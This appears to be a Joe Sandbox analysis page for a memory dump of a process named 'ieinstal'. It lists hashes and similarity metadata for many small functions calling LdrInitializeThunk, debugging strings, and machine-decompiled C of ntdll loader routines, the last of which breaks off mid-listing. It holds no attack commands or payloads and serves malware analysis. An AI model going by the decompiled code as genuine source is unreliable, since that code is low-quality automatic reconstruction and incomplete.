Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6727dd930fc35aea02b83033338072a9d27abd5aa39cf4cc2391bab72c12f7bc
Instruction ID: 7a72a9dee0428716a0e4294791bfb1181316afbdbd95080321cd6d4f2f2085fb
Opcode Fuzzy Hash: 6727dd930fc35aea02b83033338072a9d27abd5aa39cf4cc2391bab72c12f7bc
Instruction Fuzzy Hash: 4C90027120610417D11261594544707400997D4281F92C416F4414518D969689A2B161

Uniqueness

Uniqueness Score: -1.00%

Function 22749A50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22749A5A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c11f04ec3af7e032f848a230f88b631f79f6c07b37cc907c209bf39661d8aa2
Instruction ID: 827e1ed3b27c1a3e05c2a36e6bdc15331db0aaf527e853aa61265548bf387ab1
Opcode Fuzzy Hash: 8c11f04ec3af7e032f848a230f88b631f79f6c07b37cc907c209bf39661d8aa2
Instruction Fuzzy Hash: 2B90027121690047D20165694C54B07400597D4343F52C119F4144514CC95588B17561

Uniqueness

Uniqueness Score: -1.00%

Function 22749840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274984A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9e8f08b101cbb8a001061cc1cfd5540888e2c9c69d23e6cacd6f6f080e3ac74
Instruction ID: c169c6f46af3bb8f0bc96638c046925203af3aa5e064b68079d5aa10d3a4753d
Opcode Fuzzy Hash: f9e8f08b101cbb8a001061cc1cfd5540888e2c9c69d23e6cacd6f6f080e3ac74
Instruction Fuzzy Hash: 4B900271247141575546B15944445078006A7E4281792C016F5404910C856698A6F661

Uniqueness

Uniqueness Score: -1.00%

Function 22749A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22749A2A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7dfad5b95a36d77e8137ff52eecf81a76ab3a0a4d517c6ac1244041a99752318
Instruction ID: 061a7b1f9c4b7e978dba1ead16afac73701ffe1f50c607818a0e57fd37cb2355
Opcode Fuzzy Hash: 7dfad5b95a36d77e8137ff52eecf81a76ab3a0a4d517c6ac1244041a99752318
Instruction Fuzzy Hash: DE900271606100474141716988849068005BBE5251752C125F4988510D859988B576A5

Uniqueness

Uniqueness Score: -1.00%

Function 227498F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 227498FA

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c1846571aef576d6645ba8d6ad07a35395bdb661b40142dc68ec97961a8969a
Instruction ID: a2e4bf673961d2cc60cce5d3f5a58b020ac5e5a7d85793d481ec89f838c4d7ce
Opcode Fuzzy Hash: 1c1846571aef576d6645ba8d6ad07a35395bdb661b40142dc68ec97961a8969a
Instruction Fuzzy Hash: 6C90027160610507D10271594444616400A97D4281F92C026F5014515ECA6589E2B171

Uniqueness

Uniqueness Score: -1.00%

Function 227496E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 227496EA

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1d23732f5b72831e40e988e46b0aa1270452528caf221c36dc171d7a4e1fbf6
Instruction ID: 44537d7751db809afb848eeb28b640eb454018e5a36d61e009ed2a3eb78ad070
Opcode Fuzzy Hash: f1d23732f5b72831e40e988e46b0aa1270452528caf221c36dc171d7a4e1fbf6
Instruction Fuzzy Hash: AA90027120618807D1116159844474A400597D4341F56C415F8414618D86D588E17161

Uniqueness

Uniqueness Score: -1.00%

Function 22749540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274954A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17b9525db643b8400a79d969b5f9c651c40631eea3da11ca69df5716891b90b2
Instruction ID: 8f92f2fee3b10c90de0ee7492c365d041de0b1456e28049daa42761d48f3ea0a
Opcode Fuzzy Hash: 17b9525db643b8400a79d969b5f9c651c40631eea3da11ca69df5716891b90b2
Instruction Fuzzy Hash: A8900275216100070106A5590744507404697D9391352C025F5005510CD66188B17161

Uniqueness

Uniqueness Score: -1.00%

Function 22749910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274991A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e063e6bdb0aeecc6ce0a7f57e77bfb4c4ebabf76a3f97d881bb1a943caca987
Instruction ID: 43ec839bc996e721bc8b4f45b8142c71caff765e7e962e7ab810c6d3b72f46e9
Opcode Fuzzy Hash: 9e063e6bdb0aeecc6ce0a7f57e77bfb4c4ebabf76a3f97d881bb1a943caca987
Instruction Fuzzy Hash: 309002B120610407D14171594444746400597D4341F52C015F9054514E86998DE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 22749710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274971A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46ad089b9cebbf08c2e36eb5de13057f069f9d27a41832bb92d1da61a39655b0
Instruction ID: 2959eb75ecf49ecf8d8e4dd648e04031a6a309166d6dcedb381be1d204087369
Opcode Fuzzy Hash: 46ad089b9cebbf08c2e36eb5de13057f069f9d27a41832bb92d1da61a39655b0
Instruction Fuzzy Hash: 3190027120610407D10165995448646400597E4341F52D015F9014515EC6A588E17171

Uniqueness

Uniqueness Score: -1.00%

Function 22749FE0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22749FEA

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f08c8ec31fa85042eea827489f62f7d2192dbe80bc6e7c574de11d4a17dc2d5
Instruction ID: a6a9044df60bf8a3972a17efcef3c8e8bd0b6fc8fc3938bb616f011d9fcbb9a1
Opcode Fuzzy Hash: 4f08c8ec31fa85042eea827489f62f7d2192dbe80bc6e7c574de11d4a17dc2d5
Instruction Fuzzy Hash: F490027131624407D11161598444706400597D5241F52C415F4814518D86D588E17162

Uniqueness

Uniqueness Score: -1.00%

Function 227497A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 227497AA

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71b061594a184d2f182d64613cc629d1bcde401c9be3411e7845b9842f93b09c
Instruction ID: c43d76a7af41d89d8dccf5a818c161b4beaed55695a1707eeb7c27e2a38297e7
Opcode Fuzzy Hash: 71b061594a184d2f182d64613cc629d1bcde401c9be3411e7845b9842f93b09c
Instruction Fuzzy Hash: 6890027130610007D141715954586068005E7E5341F52D015F4404514CD95588A67262

Uniqueness

Uniqueness Score: -1.00%

Function 227499A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 227499AA

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aa971693a1546907525886d6ca0677d5484340bf8716c7f5e5121a777d0396f
Instruction ID: 36edc9f49a96ee5602aec149f5ffcfe385035e2431093062289ac3f0c7bab03c
Opcode Fuzzy Hash: 5aa971693a1546907525886d6ca0677d5484340bf8716c7f5e5121a777d0396f
Instruction Fuzzy Hash: B99002B134610447D10161594454B064005D7E5341F52C019F5054514D8659CCA27166

Uniqueness

Uniqueness Score: -1.00%

Function 22749780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274978A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce51c26c04aec101993d2ba42a15c6debc4801676a050675fd2019877c763480
Instruction ID: f2dab6ec7e42ad3105f487e17f7f2bf531937292863ee6272338f302f554e460
Opcode Fuzzy Hash: ce51c26c04aec101993d2ba42a15c6debc4801676a050675fd2019877c763480
Instruction Fuzzy Hash: DB90027921710007D1817159544860A400597D5242F92D419F4005518CC95588B97361

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 227BB260 Relevance: 37.8, Strings: 30, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*** A stack buffer overrun occurred in %ws:%s, xrefs: 227BB2F3
*** enter .cxr %p for the context, xrefs: 227BB50D
an invalid address, %p, xrefs: 227BB4CF
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 227BB38F
This failed because of error %Ix., xrefs: 227BB446
read from, xrefs: 227BB4AD, 227BB4B2
*** enter .exr %p for the exception record, xrefs: 227BB4F1
The critical section is owned by thread %p., xrefs: 227BB3B9
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 227BB323
Go determine why that thread has not released the critical section., xrefs: 227BB3C5
*** Inpage error in %ws:%s, xrefs: 227BB418
The resource is owned exclusively by thread %p, xrefs: 227BB374
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 227BB47D
The instruction at %p referenced memory at %p., xrefs: 227BB432
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 227BB3D6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 227BB53F
The resource is owned shared by %d threads, xrefs: 227BB37E
The instruction at %p tried to %s , xrefs: 227BB4B6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 227BB484
<unknown>, xrefs: 227BB27E, 227BB2D1, 227BB350, 227BB399, 227BB417, 227BB48E
*** Resource timeout (%p) in %ws:%s, xrefs: 227BB352
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 227BB476
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 227BB2DC
write to, xrefs: 227BB4A6
a NULL pointer, xrefs: 227BB4E0
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 227BB314
*** An Access Violation occurred in %ws:%s, xrefs: 227BB48F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 227BB305
*** then kb to get the faulting stack, xrefs: 227BB51C
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 227BB39B

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 97f3a21f729baa8b564391e8d2b660eabd0f407d23e4716dee790727300afe03
Instruction ID: 2c5e078b293d3d03725aeb4c635597854d7faa31c4ea8badf8b8fc844f7c83ee
Opcode Fuzzy Hash: 97f3a21f729baa8b564391e8d2b660eabd0f407d23e4716dee790727300afe03
Instruction Fuzzy Hash: 49812272A08320FFEF268F45DC88E6B3B26EF66355F410044FD092B216D3229651DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 22738E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E22738E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x227fd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x227f8464; // 0x74660110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x227f5780 & 0x00000003) != 0) {
							L22785510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x227f5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E2274B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x227f7984; // 0x68e2da0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x227f8464; // 0x74660110
					 *0x227fb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								L22739B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x227f5780 & 0x00000005) != 0) {
						_push(_t49);
						L22785510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", "true", "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x22738e0f
0x22738e16
0x22738e19
0x22738e1b
0x22738e21
0x22738e7f
0x22738e85
0x22779354
0x2277936c
0x22779371
0x2277937b
0x22779381
0x22779381
0x2277937b
0x22738e9d
0x22738e9d
0x22738e29
0x22738e2c
0x22738e38
0x22738e3e
0x22738e43
0x22738eb5
0x22738eb9
0x227792aa
0x227792af
0x227792e8
0x227792e8
0x227792af
0x22738eb9
0x22738e45
0x22738e53
0x22738e5b
0x22738e5f
0x22738e78
0x22738e78
0x22738e7d
0x22738ec3
0x22738ecd
0x22738ed2
0x22738ed2
0x22738ec5
0x22738ec5
0x00000000
0x22738e7d
0x22738e67
0x22738ea4
0x2277931a
0x00000000
0x00000000
0x22779320
0x22738ea4
0x22738e70
0x22779325
0x22779340
0x22779345
0x22779345
0x22738e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 2277933B, 22779367
Querying the active activation context failed with status 0x%08lx, xrefs: 22779357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2277932A
LdrpFindDllActivationContext, xrefs: 22779331, 2277935D

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f45726de6be0c0cd40976ca718a2c83bc2016aa4d49dd5642439b3f892cca745
Instruction ID: 61561e4db48ec7cb98f995cc541a18c8675fde15dce7f7ed7e63eb21f4731fa3
Opcode Fuzzy Hash: f45726de6be0c0cd40976ca718a2c83bc2016aa4d49dd5642439b3f892cca745
Instruction Fuzzy Hash: E5412932A8C311DFDB23AB54C988F66B7F5BB04358FC54529EA1457153EB705D80C281

Uniqueness

Uniqueness Score: -1.00%

Function 22542F40 Relevance: 4.7, Strings: 3, Instructions: 949COMMON

Download Yara Rule

Strings

H, xrefs: 22542FE0
D, xrefs: 22543A14
, xrefs: 22543640

Memory Dump Source

Source File: 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, Offset: 22539000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_22539000_ieinstal.jbxd

Similarity

API ID: H_prolog3_catch
String ID: $D$H
API String ID: 3886170330-3603950952
Opcode ID: 1e130c76712958604300d80b5640b2c4b989d6fc89edbcf73ee4abead77d45df
Instruction ID: 2b77628edec8fd72bfebe0988d9fafae2d88f74269545ae2e7bbd250ffd88af0
Opcode Fuzzy Hash: 1e130c76712958604300d80b5640b2c4b989d6fc89edbcf73ee4abead77d45df
Instruction Fuzzy Hash: 3172E670A08341ABD7109F20ED95B6FFBE5BF84704F20892DF9859A2A0EF74D644CB56

Uniqueness

Uniqueness Score: -1.00%

Function 22717E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E22717E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E2271CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, ?str?,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = L2270C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x227f5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							L22785510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x227f5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(L22727D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(L22727D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									L22787016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(L22727D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(L22727D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									L22787016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = L2273A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								L2270B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x22717e4c
0x22717e50
0x22717e55
0x22717e58
0x22717e5d
0x22717e71
0x22717f33
0x22717e77
0x22717e77
0x22717e79
0x22717e79
0x22717e7e
0x22717f45
0x22769848
0x00000000
0x22769848
0x22717f4e
0x22717f53
0x22717f5a
0x00000000
0x00000000
0x2276985a
0x22769862
0x22769866
0x00000000
0x2276986c
0x00000000
0x2276986c
0x22717e84
0x22717e84
0x22717e8d
0x22769871
0x22717eb8
0x22717ec0
0x22717ec0
0x22717e9a
0x2276987e
0x00000000
0x00000000
0x22769884
0x2276988b
0x227698a7
0x227698ac
